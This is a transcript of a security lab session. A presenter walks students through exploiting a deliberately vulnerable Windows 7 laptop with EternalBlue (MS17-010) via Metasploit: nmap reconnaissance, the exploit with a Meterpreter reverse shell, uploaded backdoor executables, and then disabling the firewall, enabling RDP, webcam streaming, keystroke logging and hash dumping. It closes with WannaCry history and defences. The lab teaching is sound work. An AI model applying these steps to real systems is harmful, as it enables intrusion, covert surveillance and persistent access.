let me go back to this. All right, so I'm demoing EternalBlue. Don't know how many of you have heard of EternalBlue before. It's specifically an exploit that is for Windows 7 before, so XP and all the Windows server versions of that. It's actually, all things considered, discovered pretty recently on the timescale of things, and it is associated with one big cyber attack that you probably all know. You go to the next slide. So I'm just going to go give a little background on EternalBlue for people, and then we're going to demo it. We're going to attack that laptop right there. And then I'll talk about kind of what happened after and what you could do to prevent this from like that machine right there. So it's MS17010. That is the Microsoft Security Bulletin ID, and then there's the CVE of 2017-0144. This is a remote code execution. So basically, from the computer being on and just connected to the internet, you can remotely execute it. It was actually developed by the NSA, and then in 2017, it was publicly shared by a hacker group called the Shadow Brokers. And then, yeah, it affects Windows XP, Windows 7, even Windows 8. And it exploits SMB, that file sharing protocol, the version 1 of SMB. The way that it works is that it injects code into the running memory of Windows. So it's kind of a one-time exploit. You do it once, and then once you're in, you get a shell, and then you can do whatever you want from there. But you can't do it twice because the memory is then changed because you've injected code into it. And so you will get a one-time shell. The way that it works is it skips, you can see here, you've got the application layer that's like with your in Windows on the desktop. The shell would be opening like PowerShell and Administrator, and then kernel is like the underlying process that makes Windows work. It injects code into the kernel. So it bypasses everything and you get straight to the system. So that's why it's really dangerous. It is, you don't have to authenticate, there's no passwords, there's nothing. It just, if it's online, you can get right into it. You can write scripts which it can connect to one machine and then from that machine jump to other machines that can then affect other ones. So you can kind of maybe see why this is a bad thing. So we'll start with the first set. If everybody's in the SSH machine, we can start. I'm going to go ahead and get in there. It's going to be student. All right. And then we're going to do some reconnaissance. We already know a lot of information about this machine. We know that it's vulnerable, but we're going to go ahead and pretend like we didn't know any of that. So the first command we're going to run is we're going to do a port check on the machine. So does anybody remember from the Nmap when we were talking about that, how to do that? What would be one command you could do? -p. Was there like an automatic script that does like the top X amount? Anybody remember that?
Doesn't Nmap check the first 1,000?
Yeah, it does, but then that's like you're waiting for 1,000 ports to be checked. Isn't there something that makes it a little easier?
Number, hyphen number. Oh, -p for a specific port?
It's Nmap -- top ports. And then we're going to do the top 50 ports. Everybody can follow along with this one if you're in the shell. And then it's 10.10.10. Does anybody remember what the vulnerable machine IP is? .50. So we'll run that scan. And we can see there's some open ports. We got MSR PC, we got a NetBIOS SSN, and we've got 445. And 445 is the target port here. That is vulnerable. That is running SMB version 1. All right, from there, we can actually use one of the scripts we learned before on Nmap to get some more information about this computer. So we're going to specify port 445, and we're going to do open, and then script equals SMB OS discovery. I did not spell that right. All right. and then provide the IP. And from there, if you run it, you get some more information about the computer. We can see what version of Windows is running, what's the name of the computer, what's the system time. This is all just information that SMB will send out to any computer that asks about it. So this isn't like we've compromised anything. It's just saying, hey, I'm open and you can talk to me. So do you want me to slow down a little bit? I can zoom in to make it a little easier to see.
Well, I just got command Nmap not found, even though I just ran Nmap.
Are you in? Can you type who am I?
Home student.
Doesn't sound right. Does it say home student or just student?
Student.
And Nmap by itself doesn't do anything?
Nmap does do stuff by itself.
Oh, okay.
Whenever I do the Nmap tag P445 tag open tag script equals SMB tag OS tag discovery, I didn't make sure it spelled it right. Yeah, I did all that.
And what does it say?
Nmap not found.
Okay, I'm gonna come check yours out. I mean, it's not too bad of a deal. We don't have to use Nmap after this. This is just a demo to kind of show you, but I'll see what happens.
Oh, because I don't know how to spell it, that's why.
Yeah, you should be good. I think that's what it was.
Yeah, I'm gonna do it.
You're good. Easy to do. All right. I'm gonna see if there's anybody online real quick, just to
Today I know.
jump in to help get people on here. Okay, we got Bennett. Can you hear us just fine?
Oh, yeah.
Sweet. All right, so we're going to continue on. So that was the discovery phase. Okay, go away, please. Okay. There's the two commands that we were supposed to run. Let's go to the next slide. So the next one is to test. Again, we already know it's vulnerable, but if you didn't, you knew that SMB was running, and you need to now check if it is vulnerable to the EternalBlue. And the way you would do that is you're going to use Metasploit. So we're going to type in MSF console in the terminal, and that should open up Metasploit. You're going to have to wait a little bit to get, it's going to say like I'm starting, and it's creating all the things it needs to, and you have to wait a little bit. Oh look, there's a kernel panic. I like when it does this because it freaked me out the first time. I was like, did my computer just crash? But yeah, you'll get this shell here. And from there, we're going to select the scanner script. So let me back up for a second. So not a lot of people are familiar with what Metasploit is, right? It is a database of scripts. It allows really easy manipulation of those scripts, but these are pre-created scripts that you can use via Metasploit. It's a giant database. You can think of it like that. Giant database of Python scripts or whatever scripts people write. And so we're just going to basically point to the directory or the place in the database and say, I want to use this script. So the way you would do that is we're going to type in, let me think this. I'm going to go use auxiliary. You can do tab to complete for these. You don't have to type the whole thing out. SMB, and then SMB, MS. And then from there, you press enter, and now you are using that script. And then from any time you're using a script, they could start with auxiliary, they could start with post, they could start with exploit, all sorts of scripts that are not just like, I want to pwn a machine, there's a bunch of stuff. And then any time you're using one, you can type show options, and it'll show you, sorry, do you want to leave that open so you can type it in? You all good? Everybody good? Cool.
Oh, did we have to put in, what was that?
Well, I'll show you that.
Okay, gotcha.
I was just going to back up here so y'all can see what this is. So here, when you do show options, you get all of the variables that can be set with this script. And so it'll tell you, yeah, you need this. You need to set this to be able to actually do anything. And so we can see the port 445. That's the SMB service port. And then we're going to want to set our hosts because our hosts is empty. And do you know what we would put there? Anybody guess?
The target IP?
The IP. So we do that by doing set and then our hosts and type in 10.10.10.50. And there we go. Now it's using the right IP. And we specified we can even check if we do show options, should show Yep, the R host is now set. And then from there, we just type run. It'll run, execute the script, and then it'll be like, oh yeah, yep, it's most likely vulnerable. And then for the next step, I'm actually not going to have you guys follow along because, like I mentioned before, EternalBlue is a one-way street. You do it once, and then if you try to do it 2 times, 3 times, the computer crashes. I'm dead serious. It like blue screened on me when I did it. So like, we're gonna do it once, and then I will show you another thing that will allow you guys to get access to it.
When I type in the use auxiliary scanner SMB, it just automatically goes to where it has like the red letters. It doesn't actually show me that list that you were just showing us a second ago.
Oh, you gotta type show options.
Oh.
I kind of went by quickly on that one though.
Got it.
And then from there you can specify the R host by doing the set, and then specify the variable, and then type in what you want to set it to.
Thank you.
What does the R stand for in R host?
Remote.
Ah, okay.
So you'll see in the next step there's an L host too. There's an R host and an L host, local remote. You'll see why, because I can explain what's going to happen when I run this exploit. But yeah, I will move on to the next step. All right, so now we're going to get remote access to that computer right there.
And this is where we do not follow along, right?
Yes, you don't want to follow along on this because if you do, it's going to blue screen the computer. So I will go through quickly on this, and then I will give you guys access. So the way that I'm going to switch over to use an exploit, it's going to be Windows, SMB, MS 17 underscore 010. Cool. And then I'm going to use that exploit, and it's going to say it's defaulting to a payload, but I'm still going to set it. So I will explain all of what's happening right here. But yeah, first we're going to set the host to the target IP. And then we're going to also set the payload to, it's already set to the right one, but we're going to do it again. It's going to be Windows, x64, Meterpreter, and then reverse TCP. And then we're going to set the L host to the IP of this machine, which was 75. And then I can do show options, and you can see what it's requiring. So there's even some other ones here, but they were automatically set. So you can even specify a password and username if you had that. You can specify a domain. But yeah, I set the R hosts, I set the local host, and it automatically is using the port 4444. And it says, where is it? Yes, this is the payload right here. Set this. So this payload, what it is doing, it is going to inject this payload into that laptop, and then it's going to listen back to the Kali machine, and then it's going to give you shell access. So I didn't make a graphic for this one. I probably should have, because it's like a little hard to like wrap your head around. But basically, from that box right there, it is going over to the laptop and sending code, and then from that laptop, it is now sending a connection back to the Kali machine, and it's using port 444. Is that everybody following?
Yes.
Cool. All right. So then everything should be set. I just type exploit. So right now, what it's doing is it's sending the code over to the laptop. And should see EternalBlue overwrite successfully completed, and then it should get a connection back. It takes a couple seconds though. But this is a general like. Let me pull up. No, I'll let it go. So there's a tool called Netcat, and that lets you listen on any port. If you provide an IP, oh, it failed. I might have to restart the computer. We'll see. Let's see if it works. But if you provided an IP and a port, it can listen on it. And so depending on what's there, oh, we got in. So, and anyway, long story short, this reverse TCP shell it's called Meterpreter. Meterpreter gives you a bunch of options. So if I go to help, it'll show me all the stuff I can do. There's a ton of stuff they've already set up. So this abstracts a lot of it for you. There's like essentially it's running a command when you do play, and it'll send and do all the work for you. You don't have to think about it. You just type in play, and it does everything for you. So it's basically like an enhanced script that lets you manipulate the computer and do a bunch of cool stuff with it. So I'm in the machine now. I can get a, what is it, webcam snap real quick. Cool. And then if I go to this directory, which I'm going to open up a new terminal. You should be able to see this too. Oh, you know what? I can't do it. Well, actually, I can do this. Student. No, I'm not going to do student. Sorry, I should have had this ready. I'm going to don't do this. This isn't very secure, but it's a lab environment, so I'm going to do some really stupid stuff here. I'm going to go to this directory here, and you all can now see this. So if I do, it's going to be what was somewhere in here? Python 3. So it's going to run a new web server here. And so if you go to open up a browser, there we go. Open up 10.10.10.75 and then port 8000. We are now on that web server that I just opened, and you can go ahead and view the images that. So I'll point it upwards. If I point it downwards, and you should be able to see. Let me go run that command again.
The whole the dog scout.
Hey!
What the dog doing?
All right, and so now I'll give you guys access, which I'm going to do by. No. You jumped away. Hold on. Sorry. There we go. Wait, before we get to that, I want to give you guys access so you guys can have fun. So we're going to make a backdoor. You can't do the exploit twice, like I said, but what we can do is we can create a door for y'all to get into. And so the way that you're going to do that is we're going to background this, which is going to background as a session. So session 1, and if you can see whatever sessions you have open by doing sessions-L. And then look, there's the tables PC, our connection right there.
Say exploit, because we didn't run that one. Right?
It's going to be a little bit different, but here I'll quickly jump through this. I'm going to have to make 1, 2, 3, 4 of those. So let's do that. I'm going to put it in here. This is a command that creates an exe for me, an automatic exe with all the information I want. So we're going to make a 10 on port 110. I'll keep that match so I don't lose track. And then, yep, that looks right. Yep. Okay. And then just created that. Made a new payload. Then I can go to sessions. This should be in the, you can actually see it update. You can see that exe. So sessions I, and then I'm going to specify the one that I just made. So then I'm back on Meterpreter. I can upload this new exe that I just created. It should be student. And then it's going to be this right here. And then what I'm going to do is I'm going to upload it to the PC. So it's going to be --, and then we're going to do Windows, and then temp. Yeah, we're going to do this student exe. Now it's uploaded on that laptop. I just uploaded a file, and now what I can do is now actually somebody else is going to do this. So somebody who's going to be student 10. You'll be student 10? Cool. So I'm going to have you run some commands.
Okay.
We got use exploit. I'm going to make this bigger for you.
Mind you, I'm still on the auxiliary scanner SMB.
You can switch. So when you do use, it switches.
Okay.
So yeah, you're going to run use exploit multi-handler.
Use configure payload.
And then yeah, you're going to set it to that Meterpreter with the reverse TCP, not the x86 or the 64 one. You're just going to use the regular Meterpreter with the reverse TCP.
So set payload windows. I tried to use tab, but it's not working for me.
Is it? Maybe this is wrong. Hold on. I will do a sanity check for you so you're not messing around. Okay, no,
Well,
that's.
everything else has been working so far.
I may have typed it in wrong. You can try the x86 one. That should work. So let's just double check. Use.
Set the payload.
Ooh, what was it again? Exploit multi-handler.
Am I supposed to be typing this in right now?
Does it already say that?
Yeah.
Multi-handler?
Yeah.
And then you should be able to say, yeah, it's using the generic one.
Payload,
Set payload to Windows.
Meterpreter, reverse TCP.
No. Oh yeah, so you should be able to. It should let you do that. So did you do that?
I've done all this so far. It didn't ask me for a yes or no question, or I didn't set the local host.
Yeah, it's going to be zero. So what this is doing is okay. This script, what it is doing is listening locally on your machine for this port, and so it's basically waiting for. It's like if you were playing catch, for example, and so it's waiting for someone to throw it a ball.
Okay.
So your mitten's ready and you're ready to catch the ball. That's what this is doing.
Okay.
So did you set the L host?
Is it the 10.10.10.50?
00000. Basically, it's saying on this computer,
Okay.
this port, I'm waiting to hear something.
Okay, I set the L host.
And then L port is going to be the 1010. Sorry, 110 is what it is.
110 for the port.
So you would do set L port, and then 10 or yeah, like that.
Yeah.
Cool.
Okay.
And then what you should be able to do is you should be able to do this exploit and then -J backgrounds it immediately, because otherwise it's like what you're going to be stuck in it until you hear back from this.
All right, exploit -J.
And then yeah, should be good. Sweet. All right, so then I'm going to switch back over to my session. Sessions.
Sessions, no active sessions came up. I don't know if
Shouldn't have one yet, but did it say it's listening on that thing now?
It just said start reverse TCP analytics.
000 port 1010
Yes.
or 110.
Yeah.
Okay, so then from there, what I can do is I can execute that exe. So it should be just execute -F, provided the path that I just gave it. And you should get a Meterpreter shell from this.
Sending stage, Meterpreter, session 1 open.
Do you have does it say Meterpreter and then the little bracket?
Not yet. I think it's still doing the thing.
Oh yeah, you should be good.
Oh,
So you do sessions now,
Mm.
and then -L, and you can see here's your Meterpreter session. So you can do -I and then 1. Now you're ready. So okay, so you kind of follow that process. I'm going to go through and get everybody
Yes.
connected. Okay. All right. So who wants to be next? Who wants to be? Going to be 101? Okay. All right. Let's do that creation process again. So I'm going to background this. I'm going to make a new. Oh my goodness, where was it? All right, whatever. Go ahead and grab my notes real quick. Take this, put it in there. I'll try to go quickly on this. I know this is not a very exciting part of but it'll let you get to all the fun stuff. So if I delete this, and then I just do, should be able to upload this, and then what I want you to do is I want you to go through the same process of Ismay as this, that Antonio just did, where you do the use exploit multi-handler. Are you all set with the right port and host and everything?
Yeah.
So you should be able to just do exploit-j, and now you're listening. And then when I run this, you should be able to get a shell. You ready?
Yep.
Does it say session 1 created?
Yeah.
So then you do sessions-i space 1. All right. That's the number, it's the ID number. So if you were to do sessions, does it even work here? Yeah. If I background this real quick. If I do sessions -l, you can see the ID number was.
Gotcha.
All right, I'm going to go back into that and make a new, I want to go background actually, and then I want to make a, it doesn't save that command, that's very irritating. All right, Ben, you give me 12?
Sure.
All right. And then let's go here. Sweet. Let's make that. And then I can go ahead and get back in. Go ahead and upload 12. All right. And then, or did you do are you ready for me to execute it?
Yeah, I'm ready to hit the exploit multi-handler.
Did you set all the variables and everything?
Oh,
Did you in the notes right here that I have? Did you do the set payload, set lhost?
No, I figured I didn't know if we were starting from that point or use multi-handler.
Yeah. So use multi-handler, and then you want to set the variables to Windows Meterpreter reverse TCP, lhost. Jonah, you can go ahead and do 13 real quick with all this stuff.
Should we hack the sun to begin with?
For the L port, are we using 1112 or 110?
You're using 1112. That's what yeah, that's your port. And then you should be able to just do exploit-j, and then it'll start listening on that 000. And then you good? Is it running? Cool.
What was the very last one?
And then you're going to be 113. It's exploit-j. Oh, I got you. You're going to be, 113. Cool. Did you get the Meterpreter? Cool. All right, I'm going to make another exe real quick. Oh, there it is. Why didn't I do that the first time? Yes, -j. That'll background it so you can still interact with everything. All right, let's go ahead and do that. Go back in, go ahead and upload. And sweet. All right, let me know when you're ready. Does it say session 1 created?
No session was created.
Did it exit out?
Yeah, it's going.
Oh, you're good? Cool. So you should be able to do sessions-i1, and then you can get into your session. You should see Meterpreter. So I can demo that real quick. I do background, and then I do sessions-l, sessions-l, and then do sessions-i, and then space 1. That should let you get into the Meterpreter shell. All right, do everybody's in the Meterpreter shell? Let me show you some fun. So if you do play, home, student, sound effects, let's do the Vine Boom, why not? .wav. Oh my God. Oh, I remember. So I forgot to mention this. We have to migrate to the running desktop because right now we're system host. We're at that kernel level, right? We're not at the user level. We need to switch over to the user level, and then from there we can do all the fun stuff, like open up programs and all, whatever. We'll get into the fun stuff. So let's go ahead and do PS, and that'll show us all of the running services on this computer. We can see we've got Synaptics.
Do you want us to still type in the play home stuff?
Not yet. We're going to do that. I just remembered, because I'm not automatically migrate over to the system, but what we're looking for in this list is something called Explore. So it's going to be somewhere in here. We got Firefox, we got CMD.
Quick question, man. I'm at the exploit multi-handler level still.
Yeah, so you would do sessions and then -I space 1.
Did that here.
Oh, -I.
Oh, whoops.
And then you should be able to. Yeah,
There we go.
Sweet. And then from there you do PS.
Gotcha. Thank you.
Cool. All right. So we're looking for Explorer. Let's see if I can find it. Somewhere in here. Ah, yes. That is the number we're looking for. So that's explorer.exe. If you're not familiar with Windows already, that is the running, this thing right here. If I were to do Windows key, oh, you can't see it. This right here. This is explorer.exe. Actually, this is explorer.exe too. If I were to go to my files, this is explorer.exe. This is like the shell. This is the desktop environment. So explorer.exe, if you were to switch over to explorer.exe, it means we're switching over to that desktop. So we're going to copy this ID, and then we're going to just type in migrate, and then it's, for anybody who didn't get that already, it's 1604. And you press migrate, and it'll switch over from the system to that new, and then from there you can do home, student, sound effects. There's a bunch in there, but so yeah, I'll let you guys get to this point. Again, it was migrate to, oh.
Is that me?
I think so.
Okay. Okay.
That's fun.
Oh, yeah.
I managed to open an RDB port, add myself as a user, but it turns out I can't log you off remotely, so it's just going to be stuck here.
Somebody's got to log off real quick. Let me get, what else we got this one. This one's good.
Oh, that wasn't me.
What happened?
It logged off the user. Wait, that means I can get in. Did you do that?
No, that wasn't me. That was me.
I'm in.
Damn. Oh no.
Okay.
I got Internet Explorer and Windows Media Player.
There you go.
Now we got a red team, blue team going on.
You got to prevent us now. Well, actually, now that you've done that, there's actually something we have to do. We can play off of the direct computer, but now we can't spawn things on his desktop because he's a new shell. So we have to switch over to his to actually make things appear. But yeah, let's see. What else do I have written down? There's some other things.
Your browser isn't supported. Ouch.
We can open up CMD. Actually, could you join the Teams call? Maybe, I don't know. I don't know if it's actually going to show up. Never mind. I won't make you do that. But like, so the person who's online can see what's happening, because right now they can't.
I can do that.
If you join the Teams call, you can share your screen, and then we can. But yeah, there's some other things you can do here. There's this one, which is a long string. I can put this in chat for people to grab. But with this, we can do.
Yeah, that's great. This is all built into Metasploit.
That's
Those are
PowerShell. That's PowerShell commands. That's just PowerShell. So like any Windows computer can do this.
Don't hack my computer.
Don't do it. Don't do it.
The One Piece is real.
All right.
What else do I got? There's some other things. We can make windows appear. We're gonna need to switch over to the process to make that happen though. Let's see. There's this. Right now it's not gonna do anything because if we do the screen share, but we can do webcam stream. And so if I do webcam stream, should be able to go back to that website over here. That one that was hosted here at the 10.10.75.8000.
Operation failed?
And then we can go ahead and refresh, and then there should be this HTML. And if you go there, we got a live feed of that webcam. You can go.
Oh, that's spooky.
Yeah, kind of scary, huh?
Scary, yeah.
Well, this is like legitimate tools used by real hackers. Like this has been used before, so be careful.
Camera cover.
Yeah, that's the camera. This is why people have camera covers.
Piece of tape.
Why does mine say operation failure?
For what were you trying to do?
Just the webcam _ screen.
I think it's because there's already one running.
Okay, gotcha.
Might be why it's happening.
You could connect to that same IP though and still see it.
Yeah, you can go to here. Everybody can go to this. Everybody should be able to see this, and they can go to the webcam.
It's also preventing you from taking the desktop screen.
Oh, is it not letting you?
Yeah, access is denied.
Well, that's possibly because it's logged out. It could be because there's the RDP session, which we can take a screenshot of the desktop. So
Which
let's.
one is the screen?
It's going to be the Q or OUT out.
Got it.
Y dot.
Oh, neat. Oh, super neat.
All right. Whoa.
But mine's not playing, like, if I'm looking at it on my side, it's just a...
Oh, I'm not an administrator.
Oh, is it not?
I forgot.
Huh?
Is it not
It's not streaming, it was just like a picture.
Hmm.
I wonder, can I refresh this?
It does run some JavaScript code in the background, or not JavaScript. Yeah, JavaScript, where it opens up a new image each time. But yeah.
If I refresh, I can have a little...
Oh, I think it's gonna. It might cut out. I know there's a timer on this one. So what else can we do?
I made myself an administrator.
Nice, nice. You can.
Why is your local groups just able to be edited by shell? Shouldn't that be like locked down administrator, or does Metasploit get you like an elevated shell because you're at kernel level?
Sorry. It's yes. You have an elevated kernel. You are system level. Remember the kernel. You're at kernel level. You're the system. You're not the user that's installed on the computer. I don't know how you got RDP. I don't know what method you use. Is there just a command in the Meterpreter that lets you do it?
No, I I listed your open ports, saw 3389 wasn't open. I first added it 3389 like allowed through firewall, but I would just turned off your firewall completely. And then I enabled a registry edit to open RDP. So anyone right now can just knock me out if you try.
Well, before we do that, let's. Are you sharing on the Teams?
Yeah.
Sweet. So we can see. Actually, let me get this on the recording for people, so we can actually see the desktop. You're on Windows 7 right now. How did you get Chrome? Did you just install that?
I just installed it.
Okay. You already got Firefox, dude.
No, I'm trying to go to YouTube, but it's like your browser's not supported. So, you know.
Oh, you gotta get ups on that YouTube game right now. Oh, there we go.
So I don't think sound's playing, but
That's actually funny because in the digital forensics case, I'm pretty sure that's the exact file that was pushed.
Yeah. Blasted.
actually, can we hear this? Why is my sound?
Only if PowerShell sings it.
Really?
No.
Okay.
Oh yeah.
That only plays from your laptop, though.
I think it also it's sharing sound right now. Oh, it's not. There we go.
Oh, how'd you do that?
I just pressed share sound.
Gotcha. That's okay.
All right, enough rickrolling.
Wait, I'm starting to see if I can find your. Stay in there.
All right.
I want to see if anybody can find the exe that's currently running this RDP session.
I don't think it's.
Maybe it's this one.
Yeah. Well, try killing that.
Well, I don't want to kill it. I want to see if I can make something happen. Oh, can't migrate to this process. No privileges. Ooh, I'm in the wrong, so I've got to go backwards. There's this other one, so let me see if I can get to this. Migrates here. Okay, no, can't do that because I'm not high enough level. Let's do git. Oh, there were some other commands that I totally glossed over because I wanted to just get right to the fun stuff. But there's some sysinfo. We'll dump. This is information we got from that SMB. We also can do ipconfig, see what setup, what interfaces there are. There's a Bluetooth interface. There's these. We're looking for. Yep, there's the 10.10.50. So that's the this is the Ethernet adapter that's plugged into that laptop over there. Nice background. That's nice. What else? We got hash dump, and then so. Ooh, we can't do it because I'm not privileged. Let me go up here to. Where is it? I want somewhere here. Somewhere here. If I can find it. Git system. That might be what it is.
Oh.
Attempt to elevate your privilege to that of the local system.
If it doesn't just crash, I may have just killed this session.
You just knocked me into your user.
Whoa.
Who? Okay, somebody else is doing that. That was me.
No, because this right here, I sent this like 30 minutes ago, and I was trying to get an alt tab going so I could show it. It was in the background. But I was on my own desktop, and now I'm back to your Bobby tables.
Now you're on Bobby tables?
Yeah. I'm showing Bobby tables. I don't have anything. Like I don't have See, I have this return to desktop.
Oh, because you're logged in as system. So the way that in Windows they set this up in Windows XP, but basically like you have separate desktops. So when somebody runs a program, it doesn't just show up on yours because you're on a separate installation. So like you have your own desktop. Bobby Tables has their own desktop. When you try to run programs, it'll say, hey, somebody's trying to run a program on Bobby Desktop's computer, but like you have to get that interactive services detection.
So how come I'm able to view your desktop?
Because you only have one user installed. You're not supposed to do this. So we're going a little past the limits of what Windows wanted you to do. It's not designed for this, but it does. This was an intentional thing, so people could just like on older versions of Windows, if you got hacked, they could just send stuff up on your desktop immediately. For this, you do have to like. Sorry, I totally lost my train of thought there. I'm trying to see if I can get the thing to work. Oh, it timed out. You can configure this. Didn't work.
Oh, new website?
I wish it would let me switch over. So I guess if you switch to an Explorer, you can't get back. There's a one-way ticket. We do migrate. Nope. If I can make a new thing, I might be able to connect to it. I was not prepared to hack the RDP. Oh, somebody's on the website. Uh-oh.
Oh yeah.
This is gonna be the picture.
Yeah.
Oh,
Whoa.
dang it. Actually, I'm just gonna do. Actually, I can just do.
The Bluetooth device is ready to pair.
There we go. 5. I'm getting a new Meterpreter shell, which should hopefully be at system level. And then I didn't do the exploit J. Should have a new session. There we go. Then from there, oh, maybe I'm not system. I theoretically should be able to switch over, but maybe not. Let's see if I can find it.
This is going to grab.
I think because there's already somebody logged in the system, it won't let me do it. Well, the demo doesn't work as expected. Well, let me see if I can do background sessions 1. That's not what I'm gonna do. Well, what I was trying to show is you can make a box up here. I can't do it because I can't get access to your explorer.exe because it's running at too high of a level. Well, yeah, you're running Chrome as root. You got root access to Chrome.
Did I?
I mean, your system level. You're running everything on Windows as system. You got the nice background.
What else can we do?
Well, I was going to show you how to make stuff pop up. We can still make stuff play off of it. We can do a record on the mic and then listen to an audio file, but that's kind of all besides the point. I was going to wrap up here, but I was going to wait maybe a little bit till Tonio gets back. Since they're gone, I don't want to do this without people being here, but this is not running anymore.
What?
There's some WAV files. Somebody's been putting recordings, actually.
Oh, yeah, I did a few audio recordings.
Let's see if I can I play it in the browser? No. Let's go. Let's listen. Oh, dude, I have Windows Media Legacy Player installed. Dude, that's crazy. Don't want to open it with that. Please don't do that. Ah, somebody's playing with it.
Oh yeah. Did you get it? My speaker's also blown to shenanigans, so it's not going to come out right.
So it looks like the shell that I'm running is the shell into your lobby tables, but I RDP'd into a different one. So I'm able to send pop-up messages to you, but not to me, because I'm on a different session.
If you go to the bottom left, you can do, should say, yeah, you are your own user. You created a new account and you logged into that. So you're, maybe if I go to this, I can find you. There's Bobby Tables. I don't see you. It's interesting. You don't show up here.
Are you in the administrators group, or did you just create a normal user?
This is a normal user.
Oh, I created myself as administrator. So,
Well, it should be. He should be an admin. If you go to Control Panel.
give me a second. I was just checking control users. Where is it? Oh, that's my up.
Should be able to, yeah.
Okay. Well, you are an administrator. Maybe you probably have to Interesting.
You got a call.
Ask Grant. He's our social engineering expert.
Oh, I like that. That's a good icon right there.
In the thing, there's a sound effects slash. And you click on that, it's just a bunch of sound bites.
There's no such global user for Bobby tables.
No such Bobby tables.
Is it Bobby tables or Bobby table?
You trying to get it to log in?
No, I'm putting keyboard inputs because I'm looking at the keystrokes.
Oh,
I'm trying to, I don't know where they're going.
so if you're, did you migrate over to the Explorer?
I believe so, yeah.
So we can't have two desktops open at the same time. If I log in here,
It's gonna kick me out. Try it.
Do it. Would they be showing up in my PowerShell?
actually they should show up on the computer right here. Okay, you just logged in. You do this, bang, disconnect. Does it ask you?
It's gonna ask me. If I don't, it's gonna disconnect in 30 seconds. So that's what happened.
You're logging in as your own user.
Huh?
I think, I'm pretty sure.
Yeah. Bye.
And then, so from here, now you should be able to do the screen share. So if I were to do screen share in the Meterpreter, it should show up on the, but yeah, if you were to do keystrokes, so let's just open up, a notepad real quick. All right, notepad's open. Let me open up screen share so you can see what's happening. So we do screen share. It's going to open up this HTML file. You can now go there. We go to refresh. Is this new HTML? It doesn't work. Well, there's going to be images that you can look at. That's not the right one. That's the right one? That's the right one. So now if you do send keystroke.
Go into DPZ.
DPZ.
Yeah.
Oh, you opened up one.
Yeah.
Okay. So we've got, so if we were to do send, or is it keystroke?
Keystroke _ start. Or key scan, excuse me, key scan.
Keyboard send. Send.
I think that's GMD.
Yo.
So now you all have access to this. If you're on the Explorer, you should be able to send things to this. Oh, looks like it cut out. So we do, there's going to be a new one, I think, if this one works. Oh wow, it's getting pretty long in here. You got this one. So that's not live. With this one. Hey, there we go. Is this one live? Okay, that's not going to work. All right, well, I'm locked in. This should be live, though. You can't see the live desktop. If I were to, like, open up a program, you can see this happen on the laptop. Yeah, it's live. Let me do the little demo of making something happen here. If I were to execute this, oh, it's not going to work with the stream open. Oops. Somebody else can execute this, which I'll put in the chat real quick. It's going to be in the meeting notes. Anybody wants to go do it? Do that. And oh, is it? It's still live. Should something should pop up, maybe, if you're on the Explorer. Did anything happen? Anybody try running it? It's in the Discord channel, and then meeting notes. Still can't see it. How about now? There we go. Let's execute VDS message box. It might not work. We'll see. Maybe, maybe not. Maybe.
You said put in that.
Oh, it's stopped sharing. The timer ran out. But yeah, if I were to do, I do this. Oh yeah, it is not properly escaped.
You have been hacked.
Oh, I hate all this stuff. It's always a little chore. Do I want to do this? We'll find out. Yeah, I don't know. It's just what it was supposed to make a little pop-up happen. I think I typed the command in wrong, or I saved it incorrectly. So anyway, that's more or less getting access to a Windows 7 laptop using EternalBlue. I will do one last little thing, which is unfortunately, maybe for the person running the computer, not super good, but there's this exe right here, CSRSS. Well, I think it'd be pretty bad if we were to do that. Oh, I can't. Dang it. Dang you for not giving me root access. And if I do git system, does that work? Nope, doesn't.
Or you can RDP in.
I could RDP in and kill it, but
Do it.
damn.
Do it.
Oh man, I don't know how would you,
Were you going through?
let me test something out real quick. I'm gonna see if I can get this to work. I want this to work. This would be fun. I will open up the slides back again. So we can go ahead and, yep, I was kind of going to show you, but yeah, the sysinfo, the IP config, the hash dump. The hash dump is the passwords. So you can actually get the passwords of, I don't know what you said ever to your thing, but it's up there, so somebody can go grab it. So hopefully you didn't use a password you care about.
I said password.
Okay. All right, so I should be able to do this.
It's keyscan_dump.
All right, I can do shell. That drops me down to, classic administrator shell, and I can go ahead and just do some shutdown, provide it some arguments, rf, t0, and is it still live?
Die.
No.
Oh, it just regularly shut down. That's boring. Gracefully shut down. Come on. All right. Well, yeah, that killed it. It is all of our connections are dead. That's what the session one died of dysentery. I tried my best. If you were to kill that process right here, what was it? The CSRSS.exe, it would blue screen the computer. So that's what I was trying to do, but it didn't happen. Didn't work.
How did you list the process?
PS is PS, but yeah, you're disconnected. Can't do it. Windows is fine. It's very resilient.
For now.
PS is not.
Those were those other things with the web server. We got the fake pop-up box that didn't work because I got the wrong command for it, but this is kind of back to what originally this was used for, or I guess what made it famous was WannaCry. So I don't know, maybe you've seen this screen before, hopefully not on your own computer, but somebody took a screenshot of it for you. This is a ransomware attack, and so they do accept it, and they don't unlock your hard drives, unfortunately. So it was a bit of a scam. But WannaCry happened in 2017. It affected huge swaths of the world. You can see in this map here, just tons and tons of countries are affected all over. And if you were running, Windows 7, Windows 8, even, you can see they used EternalBlue and they used a worm to spread to a bunch of computers. And from there, they, encrypted your hard drives, set up this screen, says, yeah, you got to pay us or else you're not going to get access to your data. And so, like, imagine if you're a bank, imagine if you're, a healthcare institution, like you can't give your patient services anymore because like your systems are down and they're like gone. They deleted the information. So huge, yeah.
But if they did it to your personal computer and you had a backup, it really wouldn't affect you negatively.
Yeah, and so there were companies that did make backups. Okay. They have a backup plan. They store their data elsewhere. So like, one went down, that sucks. Their systems are down, but it's like that still costs, hundreds of thousands of dollars for those companies to be like, yeah, we're down for the day. We can't do anything. Like, so it was super expensive.
Yeah.
And it was used in other attacks too, not just WannaCry. WannaCry is easily the most famous because it was such a widespread, common attack that is widely out there. What can you do to prevent this? Well, I didn't demo it, but on that machine there, I actually have Windows Firewall turned off. If I had turned Windows Firewall on, you can't do this EternalBlue. I mean, you can get around the Windows Firewall, but it's like significantly harder just by turning the Windows Firewall on. Like, not even updating the computer, not doing anything. I just have the firewall on, and it prevents me from just doing what I just did. You can't. It just bounces. It says, you can't do anything. You could turn off SMB. Do you need file sharing in your network? Well, turn it off, and then you don't have to worry about this exploit. You could, again, use firewalls that aren't even on your computer. Like, your router does so much to protect you from the internet. You don't know. Like, they're effective for a reason. Is a good way to put it. And then, updating your computer. You just update it. They have a patch. If I were to update Windows 7, can't do anything. It's completely, you can't hack it. CrowdStrike, that can happen too. That's the other way. That's the downside. If anybody's not familiar with CrowdStrike, that happened, I want to say, 2022, 2023?
Last year, too.
Yeah, it was last
2024?
Actually.
Damn, time moves way too quickly. I'm like way out of.
I was trying to fly when that happened.
